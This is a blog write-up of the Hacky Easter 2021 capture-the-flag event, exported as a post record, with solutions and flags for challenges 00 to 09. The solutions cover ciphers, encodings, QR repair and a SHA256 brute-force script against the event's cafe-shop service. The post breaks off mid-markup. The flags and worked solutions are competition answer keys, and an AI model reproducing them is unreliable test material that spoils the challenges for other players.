{"id":2282,"date":"2021-05-13T01:37:35","date_gmt":"2021-05-13T01:37:35","guid":{"rendered":"https:\/\/devel0pment.de\/?p=2282"},"modified":"2021-05-13T17:51:53","modified_gmt":"2021-05-13T17:51:53","slug":"hacky-easter-2021-writeup","status":"publish","type":"post","link":"https:\/\/devel0pment.de\/?p=2282","title":{"rendered":"Hacky Easter 2021 writeup"},"content":{"rendered":"\r\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"789\" height=\"64\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2021\/04\/he21_title.png\" alt=\"\" class=\"wp-image-2399\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2021\/04\/he21_title.png 789w, https:\/\/devel0pment.de\/wp-content\/uploads\/2021\/04\/he21_title-300x24.png 300w, https:\/\/devel0pment.de\/wp-content\/uploads\/2021\/04\/he21_title-768x62.png 768w\" sizes=\"(max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\r\n\r\n\r\n\r\n<style>\r\n.hl {\r\n  color:#2222ff;\r\n  font-family:\"Courier 10 Pitch\", Courier, monospace;\r\n  font-weight:bold;\r\n}\r\n\r\n.hl2 {\r\n  color:#ff0000;\r\n}\r\n\r\n.bold {\r\n    font-weight:bold;\r\n}\r\n\r\n\r\n.tblChlg {\r\n  border:none;\r\n  padding:10px 10px 10px 0px;\r\n}\r\n\r\n.tblChlg tr {\r\n  border:none;\r\n}\r\n\r\n.tblChlgInner {\r\n  border:none;\r\n}\r\n\r\n.tblChlgInner tr {\r\n  border:none;\r\n}\r\n\r\n.tblChlgInner td {\r\n  padding:5px;\r\n}\r\n\r\n.tblChlgInner tr td:first-child {\r\n  font-weight:bold;\r\n  width:20%;\r\n}\r\n\r\n.noob {\r\n    background-color:#69bbe9;\r\n    color:#ffffff;\r\n    padding:5px;\r\n}\r\n\r\n.easy {\r\n    background-color:#8fe699;\r\n    color:#000000;\r\n    padding:5px;\r\n}\r\n\r\n.medium {\r\n    background-color:#e6cb39;\r\n    color:#000000;\r\n    padding:5px;\r\n}\r\n\r\n.hard {\r\n    background-color:#e68f8f;\r\n    color:#000000;\r\n    padding:5px;\r\n}\r\n\r\npre {\r\n    white-space:pre-wrap;\r\n    word-break: break-word;\r\n}\r\n\r\n.fake_link {\r\n    color:#0000ff;\r\n    text-decoration:underline;\r\n}\r\n<\/style>\r\n\r\n\r\n\r\n<p><span class=\"hl\">HackyEaster<\/span> was awesome again. From a technical point of view there weren&#8217;t too much new things, but the creativity of the provided challenges made it really fun. Including the little teaser challenge there were a total amount of <span class=\"hl\">37<\/span> challenges. These challenges were divided into different levels. You could only proceed to the next level, if you have earned enough points in the current level. I really liked that new idea.<\/p>\r\n\r\n\r\n\r\n<!--more-->\r\n\r\n\r\n\r\n<p style=\"font-size:10px\">\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"noob\"><a href=\"#he21_00\">HE21.00 Teaser Challenge<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"noob\"><a href=\"#he21_01\">HE21.01 Intro<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"noob\"><a href=\"#he21_02\">HE21.02 Basement Cat<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"noob\"><a href=\"#he21_03\">HE21.03 Easy One<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_04\">HE21.04 Beehive<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_05\">HE21.05 Unicorn<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_06\">HE21.06 Mystical Symbols<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"noob\"><a href=\"#he21_07\">HE21.07 Caesar&#8217;s Meme<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"noob\"><a href=\"#he21_08\">HE21.08 Sunshine<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_09\">HE21.09 Cafe Shop<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_10\">HE21.10 Ghost in a Shell 1<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_11\">HE21.11 Hidden<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_12\">HE21.12 Ansi Art<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_13\">HE21.13 No No No<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_14\">HE21.14 Haxxor what?<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_15\">HE21.15 Social Checker<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_16\">HE21.16 LOTL<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_17\">HE21.17 Digizzled<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_18\">HE21.18 Bunny Beat<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_19\">HE21.19 &#x1F608;<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"easy\"><a href=\"#he21_20\">HE21.20 Run Me, Baby!<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_21\">HE21.21 Memeory 3.0 &#8211; The Final<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_22\">HE21.22 46 Apes<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_23\">HE21.23 Eggcryptor<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_24\">HE21.24 Tacocat<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_25\">HE21.25 Lots of JWTs<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_26\">HE21.26 Lost<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_27\">HE21.27 Ghost in a Shell 2<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_28\">HE21.28 Haxxor what 2?<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_29\">HE21.29 Sailor&#8217;s Knot<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_30\">HE21.30 Pix FX<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_31\">HE21.31 Hunny Bunny<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"medium\"><a href=\"#he21_32\">HE21.32 Two Yolks<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_33\">HE21.33 Finding Mnemo<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_34\">HE21.34 The Five Seasons<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_35\">HE21.35 The Snake<\/a><\/span>\r\n<span style=\"margin-bottom:10px;display:inline-block;\" class=\"hard\"><a href=\"#he21_36\">HE21.36 Doldrums<\/a><\/span>\r\n<\/p>\r\n\r\n\r\n\r\n<style>\r\ncode {\r\n  font-family:\"Courier 10 Pitch\", Courier, monospace;\r\n  font-size:14px;\r\n  line-height:18px;\r\n  background-color:#000000;\r\n  color:#00ff00 !important;\r\n  padding:0px 10px 15px 10px;\r\n  display:block;\r\n  white-space:pre-wrap;\r\n  word-wrap:break-word;\r\n  margin-bottom:15px;\r\n}\r\n<\/style>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_00\">HE21.00 Teaser Challenge<\/h1>\r\n<table class=\"tblChlg\">\r\n<tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/he21_00_01.jpg\" width=\"300px\"\/><\/td>\r\n<\/tr>\r\n<tr><td>\r\n<pre>\r\nEd wrote you a letter containing strange symbols:\r\n\r\n<span class=\"hl\">;85)8( )\u20210\u00b68\u2020 -\u2021*3(5;)<\/span>\r\n\r\nCan you recover the message?\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe picture shows <span class=\"hl\">Edgar Allan Poe<\/span>. A little bit of googling leads to this page: <a href=\"https:\/\/www.dcode.fr\/gold-bug-poe\" rel=\"noopener noreferrer\" target=\"_blank\">Gold-Bug Cipher<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nAfter copy-pasting the message to the ciphertext field and clicking on <span class=\"hl\">decrypt<\/span>, we get the resulting plaintext:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_00_02.png\" alt=\"Decrypt\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">TEASER SOLVED CONGRATS<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_01\">HE21.01 Intro<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge1.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"noob\">1 (noob)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>50<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nWell, this is not a real challenge yet, just a quick intro. Some would say sanity check.\r\n\r\n<b>Event<\/b>\r\n\r\n    - The event runs until May 13, 13:37 CET.\r\n    - Please do not publish write-ups, before that.\r\n    - There's a <b>Discord<\/b> server, in case you need support.\r\n\r\n<b>Challenges<\/b>\r\n\r\n    - Challenges have difficulty <i>noob<\/i>, <i>easy<\/i>, <i>medium<\/i>, or <i>hard<\/i>.\r\n    - Some challenges have a hint - opening the hint is <b>free<\/b>.\r\n\r\n<b>Flags<\/b>\r\n\r\n    - Flag format: <span class=\"hl\">he2021{just_4n_3x4mpl3}<\/span>.\r\n    - There are no flags \/ eggs hidden in the application - please do not attack it.\r\n\r\n<b>Levels<\/b>\r\n\r\n    - With a certain amount of points scored <b>in the current level<\/b>, you level up.\r\n    - You can always go back to earlier levels.\r\n\r\nThat's it for now. Check the <b>HowTo<\/b> for more details.\r\n\r\nTime to catch the first flag now! Download the image below.\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_01_01.png\" width=\"300px\"\/>\r\n\r\n<b>Hint<\/b>\r\n\r\nDownload the image. Things are <b>flipped<\/b> somehow.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided image can be flipped and scanned or the flag can be read directly from it in reverse order:\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{f1rst_0n3!}<\/span>.\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_02\">HE21.02 Basement Cat<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge2.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"noob\">2 (noob)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>50<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nHi, me iz <b>Base<\/b>ment Cat!\r\n\r\nHere iz flag: <span class=\"hl\">5jsnZDgv9EfFeoGXZrFurdz7MWAnK2WaPfszFadr<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nThe number on the image, is a hint! ;)\r\n\r\nCheck out Cyber Chef.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided string <span class=\"hl\">5jsnZDgv9EfFeoGXZrFurdz7MWAnK2WaPfszFadr<\/span> is <span class=\"hl\">base58<\/span> encoded and can for example be decoded using <a href=\"https:\/\/gchq.github.io\/CyberChef\/\" rel=\"noopener noreferrer\" target=\"_blank\">CyberChef<\/a>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_02_01.png\" alt=\"CyberChef\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{meow_nice_to_meet_you}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_03\">HE21.03 Easy One<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge3.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"noob\">2 (noob)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>50<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nHow did this happen? This was suppossed to be a valid QR code, but some ants walked across it. Can you repair the damage?\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_03_01.png\" width=\"300px\"\/>\r\n\r\n<b>Hint<\/b>\r\n\r\nA tool like paint will do to solve this one.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nSome of the areas within the QR code needs to be filled with white in order to make it readable.\r\n<\/p>\r\n\r\n<p>\r\nThere is a little pitfall, because the white lines are disconnected in the middle of the image. After fixing this and filling the required areas white using paint, we get this:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_03_02.png\" alt=\"QR-Code\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{W3llThatWasQu1t33Asy}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_04\">HE21.04 Beehive<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge4.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">3 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nThere's a secret code in the beehive.\r\n\r\nflag format: <span class=\"hl\">he2021{flaglower}<\/span>.\r\n\r\n<b>Lowercase<\/b> only, and no spaces!\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_04_01.png\" width=\"200px\"\/>\r\n\r\n<b>Hint<\/b>\r\n\r\nKim Godgul\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nA little bit of googling reveals that the encoding used is called <span class=\"hl\">ColorHoney<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nA description can be found <a href=\"https:\/\/omniglot.com\/conscripts\/colorhoney.php\" rel=\"noopener noreferrer\" target=\"_blank\">here<\/a>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_04_02.png\" alt=\"ColorHoney\"\/>\r\n<\/p>\r\n\r\n<p>\r\nBy decoding the single honeys we get the flag:\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{busybee}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_05\">HE21.05 Unicorn<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge5.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">3 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Forensics, Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nAin't no CTF without a unicorn!\r\n\r\ns7GvyM1RKEstKs7Mz7NVMtQzUFJIzUvO  \r\nT8nMS7dVCg1x07VQsrfj5bJJzs9LL0os  \r\nKQayFRRs0nIS0+0yUo0MjAyrS\/MMkw2K  \r\n8uIN84CiJcbGximKtTb6YBVAffpwjQA=  \r\n\r\n<b>Hint<\/b>\r\n\r\nDecode and inflate!\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nRegarding the hint, we can simply copy-paste the provided strings into <a href=\"https:\/\/gchq.github.io\/CyberChef\/\" rel=\"noopener noreferrer\" target=\"_blank\">CyberChef<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nBy choosing <span class=\"hl\">From Base64<\/span> and <span class=\"hl\">Raw Inflate<\/span> we get the flag:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_05_01.png\" alt=\"CyberChef\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{un1c0rn_1nflat333d!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_06\">HE21.06 Mystical Symbols<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge6.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">3 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nI found these mystical symbols.\r\n\r\nWhat do they mean?\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_06_01.png\" width=\"500px\"\/>\r\n\r\n<b>Hint<\/b>\r\n\r\n- Really <b>myst<\/b>ical, isn't it?\r\n- decimal to ascii\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nBy googling for images with <span class=\"hl\">symbols myst<\/span> we get the following picture, which looks promising:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_06_02.png\" alt=\"Symbols\"\/>\r\n<\/p>\r\n\r\n<p>\r\n<\/p>\r\n\r\n<p>\r\nThere are 25 different symbols:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_06_03.png\" alt=\"Symbols\"\/>\r\n<\/p>\r\n\r\n<p>\r\nWe have to decode every symbol to its corresponding number. Since the base of the alphabet is 25, we need to multiply the first number of each symbol with this base and add the second number. The resulting number can be converted to ASCII:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_06_04.png\" alt=\"Flag\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{S1rruz}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_07\">HE21.07 Caesar&#8217;s Meme<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge7.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"noob\">3 (noob)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>50<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nAs is only little known, the ancient Romans invented the memes.\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_07_01.jpg\" width=\"400px\"\/>\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nWe can simply typewrite the text from the meme and copy-paste it to <a href=\"https:\/\/gchq.github.io\/CyberChef\/\" rel=\"noopener noreferrer\" target=\"_blank\">CyberChef<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nBy using <span class=\"hl\">ROT13<\/span> and testing different values, we get a valid result for <span class=\"hl\">n = 23<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_07_02.png\" alt=\"Flag\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{imperator}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_08\">HE21.08 Sunshine<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge8.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"noob\">3 (noob)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>50<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nThe rays of sunshine are right there, in front of your eyes.\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_08_01.png\" width=\"500px\"\/>\r\n\r\n<b>Hint<\/b>\r\n\r\nIt's just a little puzzle.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nI used GIMP to cut out and rotate the rays in order to reconstruct the egg with the QR code:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_08_02.png\" alt=\"QR-Code\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{0h_h3llo_sunsh1ne!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_09\">HE21.09 Cafe Shop<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge9.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">4 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Web, Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nThey have good things at the cafe shop, but I want a COLA - DECAF it must be!\r\n\r\nVisit the shop here:\r\n<span class=\"fake_link\">http:\/\/46.101.107.117:2104<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<b>Hint<\/b>\r\n\r\nThey also serve hash browns, for $256.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nOn the provided website items can be ordered:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_09_01.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nBy having a look at the source code we can see that there are three possible items:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_09_02.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe value of these items begin with an integer (e.g. <span class=\"hl\">11865457<\/span>), followed by a string (e.g. <span class=\"hl\">Vanilla Cafe<\/span>).\r\n<\/p>\r\n\r\n<p>\r\nThe relevant insight here is that the <span class=\"hl\">SHA256<\/span> hash of the values contain the name of the ordered item in hex:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/09]\r\n\u2514\u2500$ echo -n '11865457 Vanilla Cafe' | sha256sum\r\nf15bffb719f26892f17eea53dc7e3459<span class=\"hl2\">cafe<\/span>021bc0db2dce72429667d7aaee96  -\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/09]\r\n\u2514\u2500$ echo -n '42640575 Cherry Cola' | sha256sum \r\n36bc94f7d7c3398319f2<span class=\"hl2\">c01a<\/span>9a9c583aed66d3a5e325aafa0652ceb2bdc271cf  -\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/09]\r\n\u2514\u2500$ echo -n '80427209 Beef Jerky' | sha256sum \r\ned734b4fc622d543774121dcfb573cf53d7ddef85ebe<span class=\"hl2\">beef<\/span>9fd7cbd8bf4363c9  -\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nAccording to the challenge description we have to order a <span class=\"hl\">COLA &#8211; DECAF<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThus we have to find an integer, whose <span class=\"hl\">SHA256<\/span> contains <span class=\"hl\">co1a<\/span> and <span class=\"hl\">decaf<\/span>, if followed by the string <span class=\"hl\">&#8221; Cola Decaf&#8221;<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nimport hashlib\r\n\r\ni = 0\r\n\r\nwhile True:\r\n  s = str(i)+' Cola Decaf'\r\n  m = hashlib.sha256()\r\n  m.update(s.encode())\r\n  h = m.hexdigest()\r\n  if ('c01a' in h and 'decaf' in h):\r\n    print(s)\r\n    quit()\r\n  i += 1\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script yields an appropriate input:\r\n<\/p>\r\n\r\n<p>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/09]\r\n\u2514\u2500$ .\/find_sha256.py\r\n19614073 Cola Decaf\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nBy submitting this id our order is accepted and an image is provided:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_09_03.png\" alt=\"Burp\"\/>\r\n<\/p>\r\n\r\n<p>\r\n<\/p>\r\n\r\n<p>\r\nNow we only need to download the image &#8230;\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/09]\r\n\u2514\u2500$ wget http:\/\/46.101.107.117:2104\/7ef384aa6ec128ef.png\r\n...\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_09_04.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\n&#8230; and scan the QR code:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/09]\r\n\u2514\u2500$ zbarimg 7ef384aa6ec128ef.png \r\nQR-Code:he2021{h3xpr3ss_urs3lf}\r\nscanned 1 barcode symbols from 1 images in 0.05 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span 